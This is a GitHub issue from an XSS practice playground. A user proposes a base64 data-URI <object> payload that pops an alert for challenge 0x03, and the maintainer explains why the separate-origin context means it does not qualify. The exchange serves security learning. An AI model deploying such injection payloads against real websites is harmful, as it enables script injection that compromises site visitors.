search

haozi / xss-demo

👮🏻‍♂️ XSS attack playground,there are answers in issues. XSS 攻防靶场,issues 有答案
https://xss.haozi.me
295 stars 58 forks source link

0x03不认可base64编码 #2

Open lifangzheng opened 7 years ago

lifangzheng commented 7 years ago

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4="> 直接在浏览器弹了,应该也算对吧

haozi commented 6 years ago

不能算合格,新开的 context,与原页面是独立的上下文,受同源限制,危害小很多。

拦截脚本没能捕获到这个 alert,原因见源码 https://github.com/haozi/xss-demo/blob/master/src/data/sandbox.raw#L10